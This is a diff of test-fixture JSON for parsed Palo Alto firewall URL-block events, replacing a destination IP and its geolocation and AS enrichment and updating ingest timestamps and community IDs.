+ "1:R87H/PodbzRBbjjT4VDhkHd+2X4=",
+ "1:yHmBEbzUrk+NT5+GUmqZ3AXUfKw="
 ],
 "transport": "tcp",
 "application": "ssl",
@@ -11039,14 +11113,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "54.209.101.70",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:39:10.768380635Z",
- "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28531,1,53160,443,4512,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7796,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "ingested": "2021-12-09T13:43:44.692020400Z",
+ "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28531,1,53160,443,4512,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7796,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "created": "2018-11-30T16:45:26.000-05:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -11069,29 +11143,28 @@
 "destination": {
 "nat": {
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "city_name": "Ashburn",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Virginia",
+ "region_name": "Jilin",
 "location": {
- "lon": -77.4728,
- "lat": 39.0481
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 14618,
+ "number": 4837,
 "organization": {
- "name": "Amazon.com, Inc."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -11107,14 +11180,14 @@
 "port": 53161,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28580,1,53161,443,3422,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7797,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28580,1,53161,443,3422,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7797,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "panw": {
 "panos": {
 "payload_protocol_id": "0",
 "destination": {
 "nat": {
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 }
 },
 "repeat_count": 1,
@@ -11129,7 +11202,7 @@
 "url_idx": "0",
 "network": {
 "nat": {
- "community_id": "1:KhCfFcRk3sovsTfN9pRRfgjsP84="
+ "community_id": "1:KzN9yBe1GajBhxZYdTjgpHnuZm8="
 }
 },
 "threat_category": "unknown",
@@ -11174,8 +11247,8 @@
 ],
 "network": {
 "community_id": [
- "1:zcJ3HhZj3urz6vGwVhseviLv7kY=",
- "1:KhCfFcRk3sovsTfN9pRRfgjsP84="
+ "1:JKXDMGEfK+AfPe3Ul2KAa/kGc2E=",
+ "1:KzN9yBe1GajBhxZYdTjgpHnuZm8="
 ],
 "transport": "tcp",
 "application": "ssl",
@@ -11214,14 +11287,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "54.209.101.70",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:39:10.768384768Z",
- "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28580,1,53161,443,3422,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7797,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "ingested": "2021-12-09T13:43:44.692026700Z",
+ "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:26,012801096514,THREAT,url,2049,2018/11/30 16:45:26,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:26,28580,1,53161,443,3422,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7797,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "created": "2018-11-30T16:45:26.000-05:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -11244,29 +11317,28 @@
 "destination": {
 "nat": {
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "city_name": "Ashburn",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Virginia",
+ "region_name": "Jilin",
 "location": {
- "lon": -77.4728,
- "lat": 39.0481
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 14618,
+ "number": 4837,
 "organization": {
- "name": "Amazon.com, Inc."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -11282,14 +11354,14 @@
 "port": 53162,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28477,1,53162,443,4651,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7798,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28477,1,53162,443,4651,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7798,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "panw": {
 "panos": {
 "payload_protocol_id": "0",
 "destination": {
 "nat": {
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 }
 },
 "repeat_count": 1,
@@ -11304,7 +11376,7 @@
 "url_idx": "0",
 "network": {
 "nat": {
- "community_id": "1:hZhkH3fz7n30Q+zsXnQejsna14Q="
+ "community_id": "1:HWEgzGI5Q8WqTRuJMK3vn5Onod0="
 }
 },
 "threat_category": "unknown",
@@ -11349,8 +11421,8 @@
 ],
 "network": {
 "community_id": [
- "1:DJHoN3ahXiIF4S4aGocL7KS/AhY=",
- "1:hZhkH3fz7n30Q+zsXnQejsna14Q="
+ "1:RXEMCbVC2LfXOorhhguojcmubrU=",
+ "1:HWEgzGI5Q8WqTRuJMK3vn5Onod0="
 ],
 "transport": "tcp",
 "application": "ssl",
@@ -11389,14 +11461,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "54.209.101.70",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:39:10.768393648Z",
- "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28477,1,53162,443,4651,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7798,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "ingested": "2021-12-09T13:43:44.692033Z",
+ "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28477,1,53162,443,4651,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7798,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "created": "2018-11-30T16:45:27.000-05:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -11419,29 +11491,28 @@
 "destination": {
 "nat": {
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "city_name": "Ashburn",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Virginia",
+ "region_name": "Jilin",
 "location": {
- "lon": -77.4728,
- "lat": 39.0481
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 14618,
+ "number": 4837,
 "organization": {
- "name": "Amazon.com, Inc."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -11457,14 +11528,14 @@
 "port": 53163,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28484,1,53163,443,19068,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7799,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28484,1,53163,443,19068,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7799,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "panw": {
 "panos": {
 "payload_protocol_id": "0",
 "destination": {
 "nat": {
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 }
 },
 "repeat_count": 1,
@@ -11479,7 +11550,7 @@
 "url_idx": "0",
 "network": {
 "nat": {
- "community_id": "1:lFuLGvzKiGz77tAPKRWLQ7eIBNw="
+ "community_id": "1:TPbW7rUO/+WbcEblP7dzCLCu8ZY="
 }
 },
 "threat_category": "unknown",
@@ -11524,8 +11595,8 @@
 ],
 "network": {
 "community_id": [
- "1:oQCUvcNDUq8NlFsOiIljRD/md2E=",
- "1:lFuLGvzKiGz77tAPKRWLQ7eIBNw="
+ "1:GTM6OCp2mFNQgMCjINUjPrat95c=",
+ "1:TPbW7rUO/+WbcEblP7dzCLCu8ZY="
 ],
 "transport": "tcp",
 "application": "ssl",
@@ -11564,14 +11635,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "54.209.101.70",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:39:10.768430359Z",
- "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28484,1,53163,443,19068,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7799,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "ingested": "2021-12-09T13:43:44.692039200Z",
+ "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28484,1,53163,443,19068,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7799,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "created": "2018-11-30T16:45:27.000-05:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -11594,29 +11665,28 @@
 "destination": {
 "nat": {
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "city_name": "Ashburn",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Virginia",
+ "region_name": "Jilin",
 "location": {
- "lon": -77.4728,
- "lat": 39.0481
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 14618,
+ "number": 4837,
 "organization": {
- "name": "Amazon.com, Inc."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -11632,14 +11702,14 @@
 "port": 53164,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28609,1,53164,443,5831,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7800,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28609,1,53164,443,5831,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7800,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "panw": {
 "panos": {
 "payload_protocol_id": "0",
 "destination": {
 "nat": {
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 }
 },
 "repeat_count": 1,
@@ -11654,7 +11724,7 @@
 "url_idx": "0",
 "network": {
 "nat": {
- "community_id": "1:lXgqW6uer7QCnFv+5qVbgX4vM6E="
+ "community_id": "1:sor2TQ+B+DVp+u1LE27kNBjsTKY="
 }
 },
 "threat_category": "unknown",
@@ -11699,8 +11769,8 @@
 ],
 "network": {
 "community_id": [
- "1:DjIyvY/MLQ8U4RrMwFVhfq30m6g=",
- "1:lXgqW6uer7QCnFv+5qVbgX4vM6E="
+ "1:Q5C2B7RS/AKSbSz/rM3DBgclAMI=",
+ "1:sor2TQ+B+DVp+u1LE27kNBjsTKY="
 ],
 "transport": "tcp",
 "application": "ssl",
@@ -11739,14 +11809,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "54.209.101.70",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:39:10.768436804Z",
- "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28609,1,53164,443,5831,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7800,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "ingested": "2021-12-09T13:43:44.692045400Z",
+ "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28609,1,53164,443,5831,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7800,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "created": "2018-11-30T16:45:27.000-05:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -11769,29 +11839,28 @@
 "destination": {
 "nat": {
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "city_name": "Ashburn",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Virginia",
+ "region_name": "Jilin",
 "location": {
- "lon": -77.4728,
- "lat": 39.0481
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 14618,
+ "number": 4837,
 "organization": {
- "name": "Amazon.com, Inc."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -11807,14 +11876,14 @@
 "port": 53165,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28564,1,53165,443,7084,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7801,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28564,1,53165,443,7084,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7801,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "panw": {
 "panos": {
 "payload_protocol_id": "0",
 "destination": {
 "nat": {
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 }
 },
 "repeat_count": 1,
@@ -11829,7 +11898,7 @@
 "url_idx": "0",
 "network": {
 "nat": {
- "community_id": "1:SDf7YJ4JLx2oja8SY0iCD/f9ZYk="
+ "community_id": "1:l9NEvHCWSvnUtakUackIbXWSIgM="
 }
 },
 "threat_category": "unknown",
@@ -11874,8 +11943,8 @@
 ],
 "network": {
 "community_id": [
- "1:fsi7g4zFbrFG09Mvo8P/WofCEKc=",
- "1:SDf7YJ4JLx2oja8SY0iCD/f9ZYk="
+ "1:XMDjE5q1I8QOvv48kKNmjbX2b2M=",
+ "1:l9NEvHCWSvnUtakUackIbXWSIgM="
 ],
 "transport": "tcp",
 "application": "ssl",
@@ -11914,14 +11983,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "54.209.101.70",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:39:10.768440852Z",
- "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28564,1,53165,443,7084,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7801,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "ingested": "2021-12-09T13:43:44.692084200Z",
+ "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28564,1,53165,443,7084,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7801,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "created": "2018-11-30T16:45:27.000-05:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -11944,29 +12013,28 @@
 "destination": {
 "nat": {
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "city_name": "Ashburn",
- "country_iso_code": "US",
- "country_name": "United States",
+ "continent_name": "Asia",
+ "region_iso_code": "CN-JL",
+ "country_iso_code": "CN",
+ "country_name": "China",
 "name": "United States",
- "region_name": "Virginia",
+ "region_name": "Jilin",
 "location": {
- "lon": -77.4728,
- "lat": 39.0481
+ "lon": 125.3228,
+ "lat": 43.88
 }
 },
 "as": {
- "number": 14618,
+ "number": 4837,
 "organization": {
- "name": "Amazon.com, Inc."
+ "name": "CHINA UNICOM China169 Backbone"
 }
 },
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 },
 "rule": {
 "name": "new_outbound_from_trust"
@@ -11982,14 +12050,14 @@
 "port": 53166,
 "ip": "192.168.15.224"
 },
- "message": "192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28542,1,53166,443,18633,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7802,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "message": "192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28542,1,53166,443,18633,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7802,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "panw": {
 "panos": {
 "payload_protocol_id": "0",
 "destination": {
 "nat": {
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 }
 },
 "repeat_count": 1,
@@ -12004,7 +12072,7 @@
 "url_idx": "0",
 "network": {
 "nat": {
- "community_id": "1:/wf94ECkqPez+fxVgk+3KErtaBQ="
+ "community_id": "1:LxZwvu6ao/nOMNrAIMzp8vAMino="
 }
 },
 "threat_category": "unknown",
@@ -12049,8 +12117,8 @@
 ],
 "network": {
 "community_id": [
- "1:wICcAfDG87s8YdjIhDgBqv6mTws=",
- "1:/wf94ECkqPez+fxVgk+3KErtaBQ="
+ "1:7aojTAJejSHQW3ERDqafP1DdGTk=",
+ "1:LxZwvu6ao/nOMNrAIMzp8vAMino="
 ],
 "transport": "tcp",
 "application": "ssl",
@@ -12089,14 +12157,14 @@
 ],
 "ip": [
 "192.168.15.224",
- "54.209.101.70",
+ "175.16.199.1",
 "192.168.1.63"
 ]
 },
 "event": {
 "severity": 5,
- "ingested": "2021-09-08T12:39:10.768444787Z",
- "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,54.209.101.70,192.168.1.63,54.209.101.70,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28542,1,53166,443,18633,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7802,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
+ "ingested": "2021-12-09T13:43:44.692088300Z",
+ "original": "Nov 30 16:45:27 PA-220 1,2018/11/30 16:45:27,012801096514,THREAT,url,2049,2018/11/30 16:45:27,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:27,28542,1,53166,443,18633,443,0x403000,tcp,block-url,\"segment-data.zqtk.net/\",(9999),business-and-economy,informational,client-to-server,7802,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,",
 "created": "2018-11-30T16:45:27.000-05:00",
 "timezone": "America/New_York",
 "kind": "alert",
@@ -12119,29 +12187,28 @@
 "destination": {
 "nat": {
 "port": 443,
- "ip": "54.209.101.70"
+ "ip": "175.16.199.1"
 },
 "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "city_name": "Ashburn",
